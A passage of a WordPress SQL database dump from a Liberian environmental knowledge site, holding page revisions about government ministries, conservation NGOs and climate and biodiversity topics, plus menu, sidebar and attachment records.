\ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-14 19:13:15','2019-11-14 19:13:15','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(2185,1,'2019-11-14 19:17:32','2019-11-14 19:17:32','The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.\n<h4>Mandate</h4>\nThe Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-14 19:17:32','2019-11-14 19:17:32','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(2186,1,'2019-11-14 19:19:13','2019-11-14 19:19:13','<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.</p><p>In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.</p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.</p><h4>Mandate</h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-14 19:19:13','2019-11-14 19:19:13','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(2188,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','The Convention requires all Parties, keeping in mind their responsibilities and capabilities, to formulate and implement programmes containing measures to mitigate climate change.  Such programmes target economic activity with an aim to incentivize actions that are cleaner or disincentive those that result in large amounts of GHGs.  They include policies, incentives schemes and investment programmes which address all sectors, including energy generation and use, transport, buildings, industry, agriculture, forestry and other land use, and waste management.','Mitigation','','inherit','closed','closed','','1815-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1815,'https://ekmsliberia.info/1815-revision-v1/',0,'revision','',0),(2189,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','The platform has been established to strengthen the knowledge, technologies, practices, and efforts of local communities and indigenous peoples related to addressing and responding to climate change, to facilitate the exchange of experience and the sharing of best practices and lessons learned on mitigation and adaptation in a holistic and integrated manner and to enhance the engagement of local communities and indigenous peoples in the UNFCCC process.','Local Community and Indigenous People','','inherit','closed','closed','','1814-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1814,'https://ekmsliberia.info/1814-revision-v1/',0,'revision','',0),(2190,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Land use activities can result in emissions of such greenhouse gases to the atmosphere or removal of greenhouse gases from the atmosphere. The United Nations Framework Convention on Climate Change acknowledges that land use can contribute significantly to mitigation of climate change, including through the promotion of sustainable management of forests and oceans as well as other terrestrial, coastal and marine ecosystems.','Land Use','','inherit','closed','closed','','1813-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1813,'https://ekmsliberia.info/1813-revision-v1/',0,'revision','',0),(2191,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Integrating considerations of gender into medium- and long-term adaptation can help to ensure that adaptation is effective and implementable on the ground. It can help to ensure that the implementation of adaptation activities will not exacerbate inequalities and other vulnerabilities, it can help to fulfill the specific needs of the most vulnerable, and it can ensure the equal participation of men and women in the decision-making and implementation phases of these activities.','Gender','','inherit','closed','closed','','1810-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1810,'https://ekmsliberia.info/1810-revision-v1/',0,'revision','',0),(2192,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Education and training are integral in enabling citizens’ contributions to local and global efforts to meet the climate change challenge. Increased knowledge and learning about the causes and impacts of climate change affect everyday lives. People become more aware of their role as consumers and are empowered to make ethically informed decisions. Communities can contribute to a solution-oriented public dialogue, while engaging local decision-makers in taking meaningful action and shaping climate policy.','Education and Youth','','inherit','closed','closed','','1809-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1809,'https://ekmsliberia.info/1809-revision-v1/',0,'revision','',0),(2193,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Technologies that we use to address climate change are known as climate technologies. Climate technologies that help us reduce GHGs include renewable energies such as wind energy, solar power and hydro-power. To adapt to the adverse effects of climate change, we use climate technologies such as drought-resistant crops, early warning systems and sea walls. There are also ‘soft’ climate technologies, such as energy-efficient practices or training for using equipment.','Climate Technology','','inherit','closed','closed','','1808-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1808,'https://ekmsliberia.info/1808-revision-v1/',0,'revision','',0),(2194,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Climate Finance refers to local, national or transnational financing—drawn from public, private and alternative sources of financing—that seeks to support mitigation and adaptation actions that will address climate change.','Climate Finance','','inherit','closed','closed','','1683-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1683,'https://ekmsliberia.info/1683-revision-v1/',0,'revision','',0),(2195,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Capacity-building is fundamental to achieving the objectives of the three Conventions. It enables individuals, organizations and societies to mitigate and adapt to climate change.','Capacity Building','','inherit','closed','closed','','1681-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1681,'https://ekmsliberia.info/1681-revision-v1/',0,'revision','',0),(2196,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Adaptation refers to adjustments in ecological, social, or economic systems in response to actual or expected climatic stimuli and their effects or impacts. It refers to changes in processes, practices, and structures to moderate potential damages or to benefit from opportunities associated with climate change.The key focus of climate resilience efforts is to address the vulnerability that communities, states, and countries currently have with regards to the many consequences of climate change. Currently, climate resilience efforts encompass social, economic, technological, and political strategies that are being implemented at all scales of society.','Adaptation and Resilience','','inherit','closed','closed','','1679-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1679,'https://ekmsliberia.info/1679-revision-v1/',0,'revision','',0),(2197,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Climate change presents the single biggest threat to sustainable development everywhere and its widespread, unprecedented impacts disproportionately burden the poorest and most vulnerable. \nUrgent action to halt climate change and deal with its impacts is integral to successfully achieving all Sustainable Development Goals (SDGs). ','Action on Climate Change and Sustainable Development Goals','','inherit','closed','closed','','1807-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1807,'https://ekmsliberia.info/1807-revision-v1/',0,'revision','',0),(2198,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Land and soil degradation undermine the security and development of all countries.\n\nThe geo-political and security challenges we face are complex. But by better implementing good land management practices, we can simultaneously help populations adapt to climate change and build resilience to drought; reduce the risk of forced migration and conflict over dwindling natural resources and secure sustainable agricultural and energy production. Land truly is the glue that holds our societies together. Reversing the effects of land degradation and desertification through sustainable land management (SLM) is not only achievable; it is the logical, cost-effective next step for national and international development agendas.','Land and Human Security','','inherit','closed','closed','','1806-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1806,'https://ekmsliberia.info/1806-revision-v1/',0,'revision','',0),(2199,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Drought and water scarcity are considered to be the most far-reaching of all natural disasters, causing short and long-term economic and ecological losses as well as significant secondary and tertiary impacts. To mitigate these impacts, drought preparedness that responds to human needs, while preserving environmental quality and ecosystems, requires involvement of all stakeholders including water users and water providers to achieve solutions for drought.\nRestoring land and extensive water harvesting raises ground water levels and increases crop yields and the fauna of the region changes.','Land and Drought','','inherit','closed','closed','','1805-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1805,'https://ekmsliberia.info/1805-revision-v1/',0,'revision','',0),(2200,1,'2019-11-14 19:49:51','2019-11-14 19:49:51','Maintaining and restoring land resources can play a vital role in tackling climate change, securing biodiversity and maintaining crucial ecosystem services, while ensuring shared prosperity and well-being. Healthy and productive land can play an unparalleled role as an engine of economic growth and a source of livelihood for billions worldwide, including the most vulnerable populations.','Land and Sustainable Development Goals','','inherit','closed','closed','','1804-revision-v1','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',1804,'https://ekmsliberia.info/1804-revision-v1/',0,'revision','',0),(2201,1,'2019-11-14 19:49:52','2019-11-14 19:49:52','The land use sector represents almost 25% of total global emissions. These emissions can be reduced however. Improved land use and management, such as low emissions agriculture, agro-forestry and ecosystem conservation and restoration could, under certain circumstances, close the remaining emissions gap by up to 25%.\nThese climate-smart land management practices nearly always come with adaptation co-benefits. Their more efficient use of resources and inputs ensure greater food and water security, and build community resilience while, at the same time, sequestering carbon.','Land and Climate','','inherit','closed','closed','','1803-revision-v1','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',1803,'https://ekmsliberia.info/1803-revision-v1/',0,'revision','',0),(2202,1,'2019-11-14 19:49:52','2019-11-14 19:49:52','Dry and sub-humid lands include many fragile environments that may warrant priority attention to avoid irreversible loss of biological diversity. Wetland areas in dry and sub-humid lands, for instance, are often of crucial importance in supporting migratory bird species. The biodiversity of dry and sub-humid lands is well adapted to the harsh conditions typified by inconsistent rainfall patterns, and, in many cases, high temperatures.','Dry and Sub-Humid Land Biodiversity','','inherit','closed','closed','','1802-revision-v1','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',1802,'https://ekmsliberia.info/1802-revision-v1/',0,'revision','',0),(2203,1,'2019-11-14 19:49:52','2019-11-14 19:49:52','Many mountain ecosystems are host to higher species richness and levels of endemism than adjacent lowlands. Mountains at lower altitudes can support exceptional biodiversity, due to compression of a wide range of ecosystems into a relatively short distance. Mountains also often provide islands of suitable habitat, isolated from unfavorable surrounding lowlands.','Mountain Biodiversity','','inherit','closed','closed','','1801-revision-v1','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',1801,'https://ekmsliberia.info/1801-revision-v1/',0,'revision','',0),(2204,1,'2019-11-14 19:49:52','2019-11-14 19:49:52','Agricultural biodiversity is the outcome of the interactions among genetic resources, the environment and the management systems and practices used by farmers. This is the result of both natural selection and human inventive developed over millennia.','Agricultural Biodiversity','','inherit','closed','closed','','1800-revision-v1','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',1800,'https://ekmsliberia.info/1800-revision-v1/',0,'revision','',0),(2205,1,'2019-11-14 19:49:52','2019-11-14 19:49:52','“Inland waters” are aquatic-influenced environments located within land boundaries. This includes those located in coastal areas, even where adjacent to marine environments. Inland water systems can be fresh, saline or a mix of the two (brackishwater). Terminology can confuse: inland water bodies include the Caspian Sea (freshwater) and the Dead Sea (hyper-saline), whereas the Baltic Sea (also largely freshwater) would be excluded by some.','Inland Waters Biodiversity','','inherit','closed','closed','','1799-revision-v1','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',1799,'https://ekmsliberia.info/1799-revision-v1/',0,'revision','',0),(2206,1,'2019-11-14 19:49:52','2019-11-14 19:49:52','“Inland waters” are aquatic-influenced environments located within land boundaries. This includes those located in coastal areas, even where adjacent to marine environments. Inland water systems can be fresh, saline or a mix of the two (brackishwater). Terminology can confuse: inland water bodies include the Caspian Sea (freshwater) and the Dead Sea (hyper-saline), whereas the Baltic Sea (also largely freshwater) would be excluded by some.','Inland Waters Biodiversity','','inherit','closed','closed','','1798-revision-v1','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',1798,'https://ekmsliberia.info/1798-revision-v1/',0,'revision','',0),(2207,1,'2019-11-14 19:49:52','2019-11-14 19:49:52','The oceans cover 70% of the planet’s surface area, and marine and coastal environments contain diverse habitats that support an abundance of marine life. Life in our seas produces a third of the oxygen that we breathe, offers a valuable source of protein and moderates global climatic change.','Marine and Coastal Biodiversity','','inherit','closed','closed','','1797-revision-v1','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',1797,'https://ekmsliberia.info/1797-revision-v1/',0,'revision','',0),(2210,1,'2019-11-14 19:57:25','2019-11-14 19:57:25','','featured_gender','','inherit','open','closed','','featured_gender','','','2019-11-14 19:57:25','2019-11-14 19:57:25','',485,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_gender.jpg',0,'attachment','image/jpeg',0),(2211,1,'2019-11-14 19:58:23','2019-11-14 19:58:23','Coming up','Gender','','inherit','closed','closed','','485-autosave-v1','','','2019-11-14 19:58:23','2019-11-14 19:58:23','',485,'https://ekmsliberia.info/485-autosave-v1/',0,'revision','',0),(2213,1,'2019-11-14 20:36:47','2019-11-14 20:36:47','<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.</p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.</p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.</p>		\n			<h2>Featured Projects</h2>		\n		<p>Coming up</p>		\n			<h2>Related Documents</h2>','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-14 20:36:47','2019-11-14 20:36:47','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(2214,1,'2019-11-14 20:37:58','2019-11-14 20:37:58','<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.</p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.</p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.</p>		\n			<h2>Featured Projects</h2>		\n		<p>Coming up</p>		\n			<h2>Related Documents</h2>		\n		<p>Coming up</p>','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-14 20:37:58','2019-11-14 20:37:58','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(2215,1,'2019-11-14 20:51:43','2019-11-14 20:51:43','','CI Official Site','','publish','closed','closed','','ci-official-site','','','2019-11-14 20:51:43','2019-11-14 20:51:43','',0,'https://ekmsliberia.info/?p=2215',1,'nav_menu_item','',0),(2216,1,'2019-11-14 20:51:43','2019-11-14 20:51:43','','CI Liberia on Facebook','','publish','closed','closed','','ci-liberia-on-facebook','','','2019-11-14 20:51:43','2019-11-14 20:51:43','',0,'https://ekmsliberia.info/?p=2216',2,'nav_menu_item','',0),(2217,1,'2019-11-14 20:56:50','2019-11-14 20:56:50','','FFI Liberia Site','','publish','closed','closed','','ffi-liberia-site','','','2019-11-16 13:25:57','2019-11-16 13:25:57','',0,'https://ekmsliberia.info/?p=2217',1,'nav_menu_item','',0),(2218,1,'2019-11-14 20:56:50','2019-11-14 20:56:50','','Liberia Fauna-Flora Info Site','','publish','closed','closed','','liberia-fauna-flora-info-site','','','2019-11-16 13:25:57','2019-11-16 13:25:57','',0,'https://ekmsliberia.info/?p=2218',2,'nav_menu_item','',0),(2219,1,'2019-11-14 21:51:32','2019-11-14 21:51:32','','MPW Official Site','','publish','closed','closed','','mpw-official-site','','','2019-11-23 15:52:04','2019-11-23 15:52:04','',0,'https://ekmsliberia.info/?p=2219',1,'nav_menu_item','',0),(2220,1,'2019-11-14 21:00:38','2019-11-14 21:00:38','As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.\r\n\r\nConservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.\r\n\r\nBuilding upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.\r\n<h2>Featured Projects</h2>\r\nComing up\r\n<h2>Related Documents</h2>\r\nComing up','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2019-11-14 21:00:38','2019-11-14 21:00:38','',1612,'https://ekmsliberia.info/1612-revision-v1/',0,'revision','',0),(2222,1,'2019-11-14 21:02:23','2019-11-14 21:02:23','<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.</p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.</p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.</p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.</p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.</p><p>FFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>','Fauna & Flora International','','inherit','closed','closed','','1614-revision-v1','','','2019-11-14 21:02:23','2019-11-14 21:02:23','',1614,'https://ekmsliberia.info/1614-revision-v1/',0,'revision','',0),(2223,1,'2019-11-14 21:03:05','2019-11-14 21:03:05','<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.</p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.</p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.</p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.</p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.</p><p>FFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		Coming up','Fauna & Flora International','','inherit','closed','closed','','1614-revision-v1','','','2019-11-14 21:03:05','2019-11-14 21:03:05','',1614,'https://ekmsliberia.info/1614-revision-v1/',0,'revision','',0),(2224,1,'2019-11-14 21:04:53','2019-11-14 21:04:53','','CI Sidebar','','publish','closed','closed','','ci-sidebar','','','2019-11-14 21:04:53','2019-11-14 21:04:53','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2224',0,'sidebar','',0),(2225,1,'2019-11-14 21:04:23','2019-11-14 21:04:23','','','','publish','closed','closed','','2225','','','2019-11-14 21:04:31','2019-11-14 21:04:31','',2224,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2225',1,'condition_group','',0),(2226,1,'2019-11-14 21:05:55','2019-11-14 21:05:55','','FFI Sidebar','','publish','closed','closed','','ffi-sidebar','','','2019-11-14 21:05:55','2019-11-14 21:05:55','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2226',0,'sidebar','',0),(2227,1,'2019-11-14 21:05:29','2019-11-14 21:05:29','','','','publish','closed','closed','','2227','','','2019-11-14 21:05:47','2019-11-14 21:05:47','',2226,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2227',1,'condition_group','',0),(2228,1,'2019-11-14 21:06:45','2019-11-14 21:06:45','','MPW Sidebar','','publish','closed','closed','','mpw-sidebar','','','2019-11-14 21:06:45','2019-11-14 21:06:45','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2228',0,'sidebar','',0),(2229,1,'2019-11-14 21:06:31','2019-11-14 21:06:31','','','','publish','closed','closed','','2229','','','2019-11-14 21:06:40','2019-11-14 21:06:40','',2228,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2229',1,'condition_group','',0),(2230,1,'2019-11-14 21:07:41','2019-11-14 21:07:41','','NaFAA Sidebar','','publish','closed','closed','','nafaa-sidebar','','','2019-11-14 21:07:41','2019-11-14 21:07:41','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2230',0,'sidebar','',0),(2231,1,'2019-11-14 21:07:26','2019-11-14 21:07:26','','','','publish','closed','closed','','2231','','','2019-11-14 21:07:37','2019-11-14 21:07:37','',2230,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2231',1,'condition_group','',0),(2232,1,'2019-11-14 21:11:24','2019-11-14 21:11:24','','ci_logo','','inherit','open','closed','','ci_logo','','','2021-08-17 21:40:24','2021-08-17 21:40:24','',1612,'https://ekmsliberia.info/wp-content/uploads/2019/11/ci_logo.png',0,'attachment','image/png',0),(2233,1,'2019-11-14 21:11:55','2019-11-14 21:11:55','','ffi_ logo','','inherit','open','closed','','ffi_-logo','','','2021-08-17 21:23:32','2021-08-17 21:23:32','',1614,'https://ekmsliberia.info/wp-content/uploads/2019/11/ffi_-logo.png',0,'attachment','image/png',0),(2234,1,'2019-11-14 21:14:05','2019-11-14 21:14:05','','mpw_logo','','inherit','open','closed','','mpw_logo','','','2021-09-08 12:34:50','2021-09-08 12:34:50','',1594,'https://ekmsliberia.info/wp-content/uploads/2019/11/mpw_logo.png',0,'attachment','image/png',0),(2236,1,'2019-11-14 21:26:54','2019-11-14 21:26:54','','','','publish','closed','closed','','2236','','','2019-11-14 21:26:54','2019-11-14 21:26:54','',2088,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2236',1,'condition_group','',0),(2237,1,'2019-11-14 21:28:00','2019-11-14 21:28:00','','','','publish','closed','closed','','2237','','','2019-11-14 21:28:00','2019-11-14 21:28:00','',2091,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2237',1,'condition_group','',0),(2238,1,'2019-11-14 21:54:42','2019-11-14 21:54:42','','','','publish','closed','closed','','2238','','','2019-11-14 21:57:42','2019-11-14 21:57:42','',2088,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2238',1,'condition_group','',0),(2239,1,'2019-11-14 21:56:14','2019-11-14 21:56:14','','','','publish','closed','closed','','2239','','','2019-11-14 21:56:49','2019-11-14 21:56:49','',2091,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2239',1,'condition_group','',0),(2240,1,'2019-11-14 22:01:40','2019-11-14 22:01:40','','featured_technology','Photo Credit: EPA','inherit','open','closed','','featured_technology','','','2019-11-14 22:01:59','2019-11-14 22:01:59','',483,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_technology.jpg',0,'attachment','image/jpeg',0),(2241,1,'2019-11-25 20:23:40','2019-11-25 20:23:40','Coming up','Land De and Drought','','inherit','closed','closed','','477-autosave-v1','','','2019-11-25 20:23:40','2019-11-25 20:23:40','',477,'https://ekmsliberia.info/477-autosave-v1/',0,'revision','',0),(2242,1,'2019-11-14 22:58:25','2019-11-14 22:58:25','','Tag Sidebar','','publish','closed','closed','','categories-sidebar','','','2019-11-16 11:22:34','2019-11-16 11:22:34','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2242',0,'sidebar','',0),(2243,1,'2019-11-14 22:58:10','2019-11-14 22:58:10','','','','publish','closed','closed','','2243','','','2019-11-14 22:58:10','2019-11-14 22:58:10','',2242,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2243',1,'condition_group','',0),(2245,1,'2019-11-14 23:48:04','2019-11-14 23:48:04','','','','publish','closed','closed','','2245','','','2019-11-14 23:48:04','2019-11-14 23:48:04','',2242,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2245',1,'condition_group','',0),(2246,1,'2019-11-14 23:48:38','2019-11-14 23:48:38','','','','publish','closed','closed','','2246','','','2019-11-14 23:48:38','2019-11-14 23:48:38','',2242,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2246',1,'condition_group','',0),(2247,1,'2019-11-14 23:48:51','2019-11-14 23:48:51','','','','publish','closed','closed','','2247','','','2019-11-14 23:48:51','2019-11-14 23:48:51','',2242,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2247',1,'condition_group','',0),(2248,1,'2019-11-15 08:11:45','2019-11-15 08:11:45','The state of the environment report is a guide for development planning and decision-making and is an important reference for environmental education and awareness. It is expected to serve as a monitoring tool for measuring progress against stated development goals. . Within the environmental domain, there are serious data gaps related to Liberia’s biodiversity, mountains, solid waste management, and greenhouse gas emissions, among others.','State of the Environment','','publish','closed','closed','','state-of-the-environment','','','2022-12-06 10:58:38','2022-12-06 10:58:38','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2248',136,'document','',0),(2249,1,'2019-11-15 08:11:03','2019-11-15 08:11:03','','State of the Environment 2006 Liberia','','inherit','open','closed','','state-of-the-environment-2006-liberia','','','2019-11-15 08:11:03','2019-11-15 08:11:03','',2248,'https://ekmsliberia.info/wp-content/uploads/2019/11/State-of-the-Environment-2006-Liberia.pdf',0,'attachment','application/pdf',0),(2251,1,'2019-11-15 08:33:21','2019-11-15 08:33:21','','UNEP 2007 Assessment_solid_waste_liberia','','inherit','open','closed','','unep-2007-assessment_solid_waste_liberia','','','2019-11-15 08:33:21','2019-11-15 08:33:21','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/UNEP-2007-Assessment_solid_waste_liberia.pdf',0,'attachment','application/pdf',0),(2252,1,'2019-11-15 08:40:05','2019-11-15 08:40:05','An overview of development and how it affects Liberia.','UNFCCC Developments between COP24 and COP25','','publish','closed','closed','','unfccc-developments-between-cop24-and-cop25','','','2022-12-06 10:58:00','2022-12-06 10:58:00','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2252',135,'document','',0),(2253,1,'2019-11-15 08:37:56','2019-11-15 08:37:56','','UNFCCC since COP24','','inherit','open','closed','','unfccc-since-cop24','','','2019-11-15 08:37:56','2019-11-15 08:37:56','',2252,'https://ekmsliberia.info/wp-content/uploads/2019/11/UNFCCC-since-COP24.pdf',0,'attachment','application/pdf',0),(2255,1,'2019-11-15 09:19:29','2019-11-15 09:19:29','<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.</p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-15 09:19:29','2019-11-15 09:19:29','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2256,1,'2019-11-15 09:19:45','2019-11-15 09:19:45','<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.</p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-15 09:19:45','2019-11-15 09:19:45','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2257,1,'2019-11-15 09:20:55','2019-11-15 09:20:55','<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.</p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		Coming up','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-15 09:20:55','2019-11-15 09:20:55','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2258,1,'2019-11-15 09:21:19','2019-11-15 09:21:19','<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in 